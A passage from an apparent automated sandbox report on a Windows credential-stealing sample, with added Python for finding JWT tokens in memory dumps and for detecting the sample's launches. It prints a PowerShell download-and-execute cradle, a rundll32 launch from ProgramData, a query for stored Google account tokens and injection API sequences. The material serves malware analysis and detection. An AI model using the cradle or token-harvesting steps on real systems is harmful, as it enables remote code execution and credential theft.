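    """Scan the way a ReadProcessMemory loop sees memory: one chunk_size read at a time.
    A tail of the previous window is carried over so a token that straddles two reads is
    still matched, and matches are keyed by absolute offset so each is reported once."""
    found = {}
    carry = b""
    for pos in range(0, len(buffer), chunk_size):
        window = carry + buffer[pos:pos + chunk_size]
        base = pos - len(carry)
        for m in JWT_RE.finditer(window):
            found.setdefault(base + m.start(), m.group(0))
        carry = window[-max_token_len:]
    return [parse_token(tok) for _, tok in sorted(found.items())]


# --- constructed sample input: a fake token placed so that it straddles a 0x208 boundary ---
def _b64url(data: bytes) -> bytes:
    return base64.urlsafe_b64encode(data).rstrip(b"=")


_PAYLOAD = {"iss": "constructed", "sub": "0", "aud": ["steam"]}   # made-up claims
SAMPLE_TOKEN = b".".join([
    JWT_HEADER_B64.encode("ascii"),
    _b64url(json.dumps(_PAYLOAD, separators=(",", ":")).encode("ascii")),
    _b64url(bytes(range(64))),   # 64 placeholder bytes, the length of an Ed25519 signature
])
SAMPLE_BUFFER = b"\x00" * 0x200 + SAMPLE_TOKEN + b"\x00" * 0x300

if __name__ == "__main__":
    print(JWT_HEADER_B64, "->", parse_token(SAMPLE_TOKEN)["header"])
    for tok in find_tokens_chunked(SAMPLE_BUFFER):
        print(tok["payload"], "signature bytes:", tok["signature_len"])
```

The chunked scanner is the part worth keeping: a naive loop that regex-scans each 0x208-byte read on its own drops any token that crosses a read boundary, which for a ~200-byte token at a 520-byte stride happens often.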
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heaplstrlenstrchr$AllocateProcessstrcpy_s
                                      • String ID: 0123456789ABCDEF
                                      • API String ID: 1327626442-2554083253
                                      • Opcode ID: e06e4223512e74cb1e907ba4f2623a4d36b498a3fb6df374a38ae2850ccc9a4f
                                      • Instruction ID: 4895b0ec020d68bf7141d3c6a065a17324cf22572f49bb378f1ca4f1420b09be
                                      • Opcode Fuzzy Hash: e06e4223512e74cb1e907ba4f2623a4d36b498a3fb6df374a38ae2850ccc9a4f
                                      • Instruction Fuzzy Hash: CB31C57291011DABCB11DFA9DC84AFEF7BDBB49340F004269E904E7351DB319A01CBA0
                                      APIs
                                        • Part of subcall function 002FF810: lstrcpy.KERNEL32(00000000,00000001), ref: 002FF839
                                        • Part of subcall function 002FF9A0: lstrlen.KERNEL32(00000000,?,?,00000000,?,002F4732,?,------,?,?,?,--,00000000,?,00000000), ref: 002FF9B9
                                        • Part of subcall function 002FF9A0: lstrcpy.KERNEL32(00000000,?), ref: 002FF9E1
                                        • Part of subcall function 002FF9A0: lstrcat.KERNEL32(?,00000000), ref: 002FF9EB
                                        • Part of subcall function 002FF8F0: lstrcpy.KERNEL32(00000000), ref: 002FF930
                                        • Part of subcall function 00300B80: GetSystemTime.KERNEL32(?,02F46C20,003101E9,?,00000000,?,?,?,?,?,002F46E7,?,00000014), ref: 00300BA9
                                        • Part of subcall function 002FF940: lstrcpy.KERNEL32(00000000,?), ref: 002FF981
                                        • Part of subcall function 002FF940: lstrcat.KERNEL32(00000000), ref: 002FF98D
                                      • ShellExecuteEx.SHELL32(0000003C), ref: 00301A8D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrcat$ExecuteShellSystemTimelstrlen
                                      • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$.ps1$<$C:\ProgramData\$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      • API String ID: 2215929589-38637897
                                      • Opcode ID: bdee5d34a87375b26ca4a08886dde90c3ebb653893c2f8a7a4b6aa8b22bc2dc2
                                      • Instruction ID: 8be1dfad54423fb09d044e6168daa3865dc19c9d499c06e95c871aa5fe5af653
                                      • Opcode Fuzzy Hash: bdee5d34a87375b26ca4a08886dde90c3ebb653893c2f8a7a4b6aa8b22bc2dc2
                                      • Instruction Fuzzy Hash: E5510C71D2010CAADB59EBA0DA62DFDF778AF14780F504179F60672291EF706A58CF50
                                      APIs
                                        • Part of subcall function 002FF810: lstrcpy.KERNEL32(00000000,00000001), ref: 002FF839
                                        • Part of subcall function 002FF9A0: lstrlen.KERNEL32(00000000,?,?,00000000,?,002F4732,?,------,?,?,?,--,00000000,?,00000000), ref: 002FF9B9
                                        • Part of subcall function 002FF9A0: lstrcpy.KERNEL32(00000000,?), ref: 002FF9E1
                                        • Part of subcall function 002FF9A0: lstrcat.KERNEL32(?,00000000), ref: 002FF9EB
                                        • Part of subcall function 002FF940: lstrcpy.KERNEL32(00000000,?), ref: 002FF981
                                        • Part of subcall function 002FF940: lstrcat.KERNEL32(00000000), ref: 002FF98D
                                        • Part of subcall function 002FF8F0: lstrcpy.KERNEL32(00000000), ref: 002FF930
                                        • Part of subcall function 002F6E90: memset.MSVCRT ref: 002F6EE7
                                        • Part of subcall function 002F6E90: LocalAlloc.KERNEL32(00000040,?), ref: 002F6F1E
                                      • lstrlen.KERNEL32(00000000), ref: 002F87C3
                                        • Part of subcall function 00300DA0: LocalAlloc.KERNEL32(00000040,002F87D9,?,?,?,?,002F87D8,00000000,00000000), ref: 00300DBC
                                      • StrStrA.SHLWAPI(00000000,AccountId), ref: 002F87E9
                                      • lstrlen.KERNEL32(00000000), ref: 002F88AE
                                      • lstrlen.KERNEL32(00000000), ref: 002F88C2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpylstrlen$AllocLocallstrcat$memset
                                      • String ID: AccountId$GoogleAccounts$SELECT service, encrypted_token FROM token_service
                                      • API String ID: 4178852800-465000181
                                      • Opcode ID: dd42dac133cd5527fe5a311886f4b74228662c0d08a19ed2248ad12fb86402a5
                                      • Instruction ID: dcb7798e5f13dbe30dc178b434283f7754b6c565b5c63293602343199267bc28
                                      • Opcode Fuzzy Hash: dd42dac133cd5527fe5a311886f4b74228662c0d08a19ed2248ad12fb86402a5
                                      • Instruction Fuzzy Hash: 85A1037292010DABDB55EBA4DE56DFEB378AE54780F504138F60272291EF70AA18CE61
                                      APIs
                                        • Part of subcall function 002FF810: lstrcpy.KERNEL32(00000000,00000001), ref: 002FF839
                                        • Part of subcall function 002FF9A0: lstrlen.KERNEL32(00000000,?,?,00000000,?,002F4732,?,------,?,?,?,--,00000000,?,00000000), ref: 002FF9B9
                                        • Part of subcall function 002FF9A0: lstrcpy.KERNEL32(00000000,?), ref: 002FF9E1
                                        • Part of subcall function 002FF9A0: lstrcat.KERNEL32(?,00000000), ref: 002FF9EB
                                        • Part of subcall function 002FF8F0: lstrcpy.KERNEL32(00000000), ref: 002FF930
                                        • Part of subcall function 00300B80: GetSystemTime.KERNEL32(?,02F46C20,003101E9,?,00000000,?,?,?,?,?,002F46E7,?,00000014), ref: 00300BA9
                                        • Part of subcall function 002FF940: lstrcpy.KERNEL32(00000000,?), ref: 002FF981
                                        • Part of subcall function 002FF940: lstrcat.KERNEL32(00000000), ref: 002FF98D
                                      • ShellExecuteEx.SHELL32(0000003C), ref: 00303667
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrcat$ExecuteShellSystemTimelstrlen
                                      • String ID: "" $.dll$<$C:\ProgramData\$C:\Windows\system32\rundll32.exe
                                      • API String ID: 2215929589-3594953769
                                      • Opcode ID: ed562fd40cf51ca4bc22af7a7c0719ebde71649b59f03344575937da1da554a0
                                      • Instruction ID: bd8ed18b79fc4617ea2e5626229a8cb35a126f14a60a81445ac797899b92faea
                                      • Opcode Fuzzy Hash: ed562fd40cf51ca4bc22af7a7c0719ebde71649b59f03344575937da1da554a0
                                      • Instruction Fuzzy Hash: D281BE72C2010CAADB59FBA0D9A6DFDF778AF14780F504139F612722A1EF706659CE60
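Added detection example, written for this page and not part of the report or of the sample: the two ShellExecuteEx functions above (the one whose strings include -nop -c "iex(New-Object Net.WebClient).DownloadString(' with .ps1 and C:\ProgramData\, and this one with C:\Windows\system32\rundll32.exe, .dll and C:\ProgramData\) assemble command lines that a process-creation log will show verbatim. The Python below runs three matching rules over constructed process-creation records. It keys on the executable's base name rather than its full path because the PowerShell path in the report is the SysWOW64 one (the sample is 32-bit), which a rule written against System32 would miss. The file names, the example.invalid URL and the parent images are constructed.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    """Minimal process-creation record (the fields a Sysmon Event ID 1 or EDR event carries)."""
    image: str
    command_line: str
    parent_image: str


# Rule 1: the in-memory download-and-execute cradle string from the PowerShell launch.
CRADLE_RE = re.compile(
    r"iex\s*\(\s*new-object\s+net\.webclient\s*\)\s*\.downloadstring\s*\(", re.IGNORECASE)
# Rule 2: a .ps1 under C:\ProgramData, the directory both launch paths use.
PROGRAMDATA_PS1_RE = re.compile(r"c:\\programdata\\[\w\\.\-]+\.ps1", re.IGNORECASE)
# Rule 3: rundll32 whose first argument is a .dll under C:\ProgramData (quoted or not).
RUNDLL_PROGRAMDATA_RE = re.compile(
    r'rundll32(?:\.exe)?"?\s+"?(c:\\programdata\\[\w\\.\-]+\.dll)', re.IGNORECASE)


def classify(event: ProcessEvent) -> list:
    """Return the names of the rules the event matches (empty list when nothing fires)."""
    image = event.image.lower().replace("/", "\\")
    exe = image.rsplit("\\", 1)[-1]          # base name: SysWOW64 and System32 hosts look alike
    cmd = event.command_line
    findings = []
    if exe == "powershell.exe":
        if CRADLE_RE.search(cmd):
            findings.append("powershell_webclient_downloadstring_iex")
        if PROGRAMDATA_PS1_RE.search(cmd):
            findings.append("powershell_script_in_programdata")
    elif exe == "rundll32.exe":
        if RUNDLL_PROGRAMDATA_RE.search(cmd):
            findings.append("rundll32_dll_in_programdata")
    return findings


def scan(events) -> list:
    """Return (image, findings) for every event that matched at least one rule."""
    hits = []
    for event in events:
        findings = classify(event)
        if findings:
            hits.append((event.image, findings))
    return hits


# Constructed events: two shaped like the launches above, one variant, two benign controls.
SAMPLE_EVENTS = [
    ProcessEvent(
        image=r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
        command_line=(r'"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -nop -c '
                      r'"iex(New-Object Net.WebClient).DownloadString(\'https://example.invalid/x.ps1\')"'),
        parent_image=r"C:\Users\user\Desktop\sample.exe"),
    ProcessEvent(
        image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        command_line=r"powershell.exe -nop -File C:\ProgramData\update.ps1",
        parent_image=r"C:\Users\user\Desktop\sample.exe"),
    ProcessEvent(
        image=r"C:\Windows\system32\rundll32.exe",
        command_line=r'"C:\Windows\system32\rundll32.exe" "C:\ProgramData\module.dll", Start',
        parent_image=r"C:\Users\user\Desktop\sample.exe"),
    ProcessEvent(
        image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        command_line=r"powershell.exe -File C:\Scripts\backup.ps1",
        parent_image=r"C:\Windows\System32\svchost.exe"),
    ProcessEvent(
        image=r"C:\Windows\system32\rundll32.exe",
        command_line=r"rundll32.exe shell32.dll,Control_RunDLL",
        parent_image=r"C:\Windows\explorer.exe"),
]

if __name__ == "__main__":
    for image, findings in scan(SAMPLE_EVENTS):
        print(image, "->", ", ".join(findings))
```

Rule 1 is the high-confidence one; rules 2 and 3 are weaker on their own and are best paired with the parent image (here the sample itself) or with a file-write to C:\ProgramData shortly before the launch.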
                                      APIs
                                      • std::_Xinvalid_argument.LIBCPMT ref: 002FD719
                                        • Part of subcall function 0030F6E0: std::exception::exception.LIBCMT ref: 0030F6F5
                                        • Part of subcall function 0030F6E0: __CxxThrowException@8.LIBCMT ref: 0030F70A
                                        • Part of subcall function 0030F6E0: std::exception::exception.LIBCMT ref: 0030F71B
                                      • std::_Xinvalid_argument.LIBCPMT ref: 002FD73A
                                      • std::_Xinvalid_argument.LIBCPMT ref: 002FD755
                                      • memcpy.MSVCRT(?,?,?), ref: 002FD7BD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Xinvalid_argumentstd::_$std::exception::exception$Exception@8Throwmemcpy
                                      • String ID: invalid string position$string too long
                                      • API String ID: 285807467-4289949731
                                      • Opcode ID: fd271a229123a52321b56c1af0aaef70052915c87fb33ac4361730fb48e0b2b5
                                      • Instruction ID: 6909f7a8ad612a7f90db343b20f63fd0efa3f8aafa2a6c6b1acb41b9a5cb1526
                                      • Opcode Fuzzy Hash: fd271a229123a52321b56c1af0aaef70052915c87fb33ac4361730fb48e0b2b5
                                      • Instruction Fuzzy Hash: 7431EA323142098FD725AE6CE890B7AF3EAEF94791B100A3EE642CF781D771D8508790
                                      APIs
                                      • memset.MSVCRT ref: 003058D5
                                      • RegOpenKeyExA.ADVAPI32(80000001,02F45820,00000000,00020119,?), ref: 003058F4
                                      • RegQueryValueExA.ADVAPI32(?,02F45450,00000000,00000000,00000000,000000FF), ref: 00305918
                                      • RegCloseKey.ADVAPI32(?), ref: 00305922
                                      • lstrcat.KERNEL32(?,00000000), ref: 00305947
                                      • lstrcat.KERNEL32(?,02F45528), ref: 0030595B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$CloseOpenQueryValuememset
                                      • String ID:
                                      • API String ID: 2623679115-0
                                      • Opcode ID: 4339bbc8b53225af49314f1ba83445af58d961edd4cd9e895c2188b5babe71e3
                                      • Instruction ID: af336045e9a47618106e17372f6abdfdb94f3753dd1a63f6bb068aa9f1243004
                                      • Opcode Fuzzy Hash: 4339bbc8b53225af49314f1ba83445af58d961edd4cd9e895c2188b5babe71e3
                                      • Instruction Fuzzy Hash: FE41B1B5911208ABCB15EFA0CC5AFEE7738AF54340F408658FA05561C1EA71AA98CFA1
                                      APIs
                                      • strtok_s.MSVCRT ref: 00301C24
                                      • StrCmpCA.SHLWAPI(00000000,00313B6C,00000000), ref: 00301C6C
                                      • StrCmpCA.SHLWAPI(00000000,00313B6C,00000000), ref: 00301CB2
                                      • StrCmpCA.SHLWAPI(00000000,00313B6C), ref: 00301CDE
                                      • StrCmpCA.SHLWAPI(00000000,00313B6C), ref: 00301D0A
                                      • strtok_s.MSVCRT ref: 00301D3C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: strtok_s
                                      • String ID:
                                      • API String ID: 3330995566-0
                                      • Opcode ID: 0af6430af0e890ea9ff340e93548a6331958b9d718ff419e7788a76b2ee21dd3
                                      • Instruction ID: 1767d6f1596bbd68627015f7c555b2582ed63294ebf4275542744e2ac0c86cda
                                      • Opcode Fuzzy Hash: 0af6430af0e890ea9ff340e93548a6331958b9d718ff419e7788a76b2ee21dd3
                                      • Instruction Fuzzy Hash: 4741CB70941209EFCB22EF18C894FF5B7B8FF18340F50495DE40687281EB70EA688B81
                                      APIs
                                      • __lock.LIBCMT ref: 0030D18F
                                        • Part of subcall function 0030CD59: __mtinitlocknum.LIBCMT ref: 0030CD6F
                                        • Part of subcall function 0030CD59: __amsg_exit.LIBCMT ref: 0030CD7B
                                        • Part of subcall function 0030CD59: RtlEnterCriticalSection.NTDLL(00000000), ref: 0030CD83
                                      • RtlDecodePointer.NTDLL(00316E40), ref: 0030D1CB
                                      • RtlDecodePointer.NTDLL ref: 0030D1DC
                                        • Part of subcall function 0030D8C7: RtlEncodePointer.NTDLL(00000000), ref: 0030D8C9
                                      • RtlDecodePointer.NTDLL(-00000004), ref: 0030D202
                                      • RtlDecodePointer.NTDLL ref: 0030D215
                                      • RtlDecodePointer.NTDLL ref: 0030D21F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
                                      • String ID:
                                      • API String ID: 2005412495-0
                                      • Opcode ID: abeadbcaa73f78501afc26a0c180947a49f2cad133e7b8e17130a6b01cce6828
                                      • Instruction ID: f13c8d0ac19b69806c5f1fee023719e631a606d4c2476714e7f36dbd1c213392
                                      • Opcode Fuzzy Hash: abeadbcaa73f78501afc26a0c180947a49f2cad133e7b8e17130a6b01cce6828
                                      • Instruction Fuzzy Hash: 7B314870D02309DFDF52AFE8D96569CBBF8BF19310F10452AE410A62D1CBB48889DF24
                                      APIs
                                      • __getptd.LIBCMT ref: 0030E7A8
                                        • Part of subcall function 0030DA31: __getptd_noexit.LIBCMT ref: 0030DA34
                                        • Part of subcall function 0030DA31: __amsg_exit.LIBCMT ref: 0030DA41
                                      • __amsg_exit.LIBCMT ref: 0030E7C8
                                      • __lock.LIBCMT ref: 0030E7D8
                                      • InterlockedDecrement.KERNEL32(?), ref: 0030E7F5
                                      • _free.LIBCMT ref: 0030E808
                                      • InterlockedIncrement.KERNEL32(00319F98), ref: 0030E820
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                      • String ID:
                                      • API String ID: 3470314060-0
                                      • Opcode ID: c152896fdb37859b5cb98808ff8471613942f24679af749869cd7ed2dc8af774
                                      • Instruction ID: 797d1a57d885e4bd1cb3332da04e684f2fd0513077b3d6c37f4b2c741136925f
                                      • Opcode Fuzzy Hash: c152896fdb37859b5cb98808ff8471613942f24679af749869cd7ed2dc8af774
                                      • Instruction Fuzzy Hash: 7901DB35B03B11DBDB23ABA4982579D7774BF09F21F018916F8106B6D1C7349881CBD2
                                      APIs
                                      • lstrcat.KERNEL32(?,02F45420), ref: 00305D5B
                                        • Part of subcall function 00300D50: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 00300D81
                                      • lstrcat.KERNEL32(?,00000000), ref: 00305D7E
                                      • lstrcat.KERNEL32(?,?), ref: 00305D9A
                                      • lstrcat.KERNEL32(?,?), ref: 00305DAE
                                      • lstrcat.KERNEL32(?,02F389E0), ref: 00305DC1
                                      • lstrcat.KERNEL32(?,?), ref: 00305DD5
                                      • lstrcat.KERNEL32(?,02F45900), ref: 00305DE9
                                        • Part of subcall function 002FF810: lstrcpy.KERNEL32(00000000,00000001), ref: 002FF839
                                        • Part of subcall function 00300D10: GetFileAttributesA.KERNEL32(00000000,?,?,002F1774,?,?,?,003101E9), ref: 00300D1D
                                        • Part of subcall function 00305A70: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00305A82
                                        • Part of subcall function 00305A70: RtlAllocateHeap.NTDLL(00000000), ref: 00305A89
                                        • Part of subcall function 00305A70: wsprintfA.USER32 ref: 00305AA2
                                        • Part of subcall function 00305A70: FindFirstFileA.KERNEL32(?,?), ref: 00305AB9
                                        • Part of subcall function 00305A70: StrCmpCA.SHLWAPI(?,003101DC), ref: 00305ADC
                                        • Part of subcall function 00305A70: StrCmpCA.SHLWAPI(?,003101D8), ref: 00305AF6
                                        • Part of subcall function 00305A70: wsprintfA.USER32 ref: 00305B18
                                        • Part of subcall function 00305A70: CopyFileA.KERNEL32(?,00000000,00000001), ref: 00305BBC
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$File$Heapwsprintf$AllocateAttributesCopyFindFirstFolderPathProcesslstrcpy
                                      • String ID:
                                      • API String ID: 987985321-0
                                      • Opcode ID: 7392a93af519d3f59d78410c6d043fa2f4c7845258d6d3759257ef66cd46787c
                                      • Instruction ID: 73e0c652b60dea6e97f04a10cc5812040940b45992feb88d105f99215b5393d2
                                      • Opcode Fuzzy Hash: 7392a93af519d3f59d78410c6d043fa2f4c7845258d6d3759257ef66cd46787c
                                      • Instruction Fuzzy Hash: 4B4164B191130C67DB29FBB0CD96EEA737C6F14700F0445A9B70A56191EB709689CFA1
                                      APIs
                                      • std::_Xinvalid_argument.LIBCPMT ref: 002FD9DA
                                        • Part of subcall function 0030F6E0: std::exception::exception.LIBCMT ref: 0030F6F5
                                        • Part of subcall function 0030F6E0: __CxxThrowException@8.LIBCMT ref: 0030F70A
                                        • Part of subcall function 0030F6E0: std::exception::exception.LIBCMT ref: 0030F71B
                                      • std::_Xinvalid_argument.LIBCPMT ref: 002FDA17
                                        • Part of subcall function 0030F693: std::exception::exception.LIBCMT ref: 0030F6A8
                                        • Part of subcall function 0030F693: __CxxThrowException@8.LIBCMT ref: 0030F6BD
                                        • Part of subcall function 0030F693: std::exception::exception.LIBCMT ref: 0030F6CE
                                      • memcpy.MSVCRT(?,?,?), ref: 002FDA78
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Similarity
                                      • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_$memcpy
                                      • String ID: invalid string position$string too long
                                      • API String ID: 85833692-4289949731
                                      • Opcode ID: 7f8c1e70a2c3bf6c6665d6985cd140065ce1aa6302a1a74297d138595fd32d04
                                      • Instruction ID: 2c1593e014130cd240a4d865c1fcd63525a9d8d4cc7bd44d2a329857290b32dc
                                      • Opcode Fuzzy Hash: 7f8c1e70a2c3bf6c6665d6985cd140065ce1aa6302a1a74297d138595fd32d04
                                      • Instruction Fuzzy Hash: E331F9333142185BD7219E5CE890B7AF39EDBA17A4F20053FF241CB291D672DC5087A5
                                      APIs
                                      • WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 002FEEB7
                                      • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 002FEEE9
                                      • SetThreadContext.KERNEL32(?,?), ref: 002FEEFF
                                      • ResumeThread.KERNEL32(?), ref: 002FEF09
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Similarity
                                      • API ID: MemoryProcessThreadWrite$ContextResume
                                      • String ID: (
                                      • API String ID: 2723624206-3887548279
                                      • Opcode ID: 9dfaca63c1c36a7f4e7b83b250af3d04767bca9a96d7ab84965033658285a514
                                      • Instruction ID: e94e1a95d5afc0b89bd45b2977ccda30e35044b6a210756a4ea60f3865f4ce6f
                                      • Opcode Fuzzy Hash: 9dfaca63c1c36a7f4e7b83b250af3d04767bca9a96d7ab84965033658285a514
                                      • Instruction Fuzzy Hash: 1A114575A01209EFCB24CF58DC84FAAB7B9FF88325F108619EA1997250C734F955CB90
                                      APIs
                                        • Part of subcall function 002FF810: lstrcpy.KERNEL32(00000000,00000001), ref: 002FF839
                                        • Part of subcall function 00300B80: GetSystemTime.KERNEL32(?,02F46C20,003101E9,?,00000000,?,?,?,?,?,002F46E7,?,00000014), ref: 00300BA9
                                        • Part of subcall function 002FF9A0: lstrlen.KERNEL32(00000000,?,?,00000000,?,002F4732,?,------,?,?,?,--,00000000,?,00000000), ref: 002FF9B9
                                        • Part of subcall function 002FF9A0: lstrcpy.KERNEL32(00000000,?), ref: 002FF9E1
                                        • Part of subcall function 002FF9A0: lstrcat.KERNEL32(?,00000000), ref: 002FF9EB
                                        • Part of subcall function 002FF940: lstrcpy.KERNEL32(00000000,?), ref: 002FF981
                                        • Part of subcall function 002FF940: lstrcat.KERNEL32(00000000), ref: 002FF98D
                                        • Part of subcall function 002FF8F0: lstrcpy.KERNEL32(00000000), ref: 002FF930
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 002F93AA
                                      • lstrlen.KERNEL32(00000000), ref: 002F95A5
                                      • lstrlen.KERNEL32(00000000), ref: 002F95B9
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 002F9374
                                        • Part of subcall function 002FF850: lstrcpy.KERNEL32(00000000), ref: 002FF878
                                        • Part of subcall function 003010F0: memset.MSVCRT ref: 0030110A
                                        • Part of subcall function 003010F0: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,?,002F727B,?), ref: 0030113D
                                        • Part of subcall function 003010F0: RtlAllocateHeap.NTDLL(00000000), ref: 00301144
                                        • Part of subcall function 003010F0: wsprintfW.USER32 ref: 00301153
                                        • Part of subcall function 003010F0: OpenProcess.KERNEL32(00001001,00000000), ref: 003011BB
                                        • Part of subcall function 003010F0: TerminateProcess.KERNEL32(00000000,00000000), ref: 003011CA
                                        • Part of subcall function 003010F0: CloseHandle.KERNEL32(00000000), ref: 003011D1
                                      • DeleteFileA.KERNEL32(00000000), ref: 002F962C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Similarity
                                      • API ID: lstrcpy$FileProcesslstrlen$CopyHeaplstrcat$AllocateCloseDeleteHandleOpenSystemTerminateTimememsetwsprintf
                                      • String ID:
                                      • API String ID: 1083493885-0
                                      • Opcode ID: 2d48446edc843fdc752f0f10f41fe6d0af15aaf4ed5dc6ae153946cbf03cd3b5
                                      • Instruction ID: 9eafc9cf331b5d3c575826808e9610b76b09e458790e5939e6eae2650392d330
                                      • Opcode Fuzzy Hash: 2d48446edc843fdc752f0f10f41fe6d0af15aaf4ed5dc6ae153946cbf03cd3b5
                                      • Instruction Fuzzy Hash: E0B1157192010D6BDB45FBB0DE66DFEB378AE54780F504138F60272291EF60AA68CF61
                                      APIs
                                        • Part of subcall function 002FF810: lstrcpy.KERNEL32(00000000,00000001), ref: 002FF839
                                        • Part of subcall function 00300B80: GetSystemTime.KERNEL32(?,02F46C20,003101E9,?,00000000,?,?,?,?,?,002F46E7,?,00000014), ref: 00300BA9
                                        • Part of subcall function 002FF9A0: lstrlen.KERNEL32(00000000,?,?,00000000,?,002F4732,?,------,?,?,?,--,00000000,?,00000000), ref: 002FF9B9
                                        • Part of subcall function 002FF9A0: lstrcpy.KERNEL32(00000000,?), ref: 002FF9E1
                                        • Part of subcall function 002FF9A0: lstrcat.KERNEL32(?,00000000), ref: 002FF9EB
                                        • Part of subcall function 002FF940: lstrcpy.KERNEL32(00000000,?), ref: 002FF981
                                        • Part of subcall function 002FF940: lstrcat.KERNEL32(00000000), ref: 002FF98D
                                        • Part of subcall function 002FF8F0: lstrcpy.KERNEL32(00000000), ref: 002FF930
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 002F976A
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 002F9734
                                        • Part of subcall function 002FF850: lstrcpy.KERNEL32(00000000), ref: 002FF878
                                        • Part of subcall function 003010F0: memset.MSVCRT ref: 0030110A
                                        • Part of subcall function 003010F0: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,?,002F727B,?), ref: 0030113D
                                        • Part of subcall function 003010F0: RtlAllocateHeap.NTDLL(00000000), ref: 00301144
                                        • Part of subcall function 003010F0: wsprintfW.USER32 ref: 00301153
                                        • Part of subcall function 003010F0: OpenProcess.KERNEL32(00001001,00000000), ref: 003011BB
                                        • Part of subcall function 003010F0: TerminateProcess.KERNEL32(00000000,00000000), ref: 003011CA
                                        • Part of subcall function 003010F0: CloseHandle.KERNEL32(00000000), ref: 003011D1
                                      Memory Dump Source
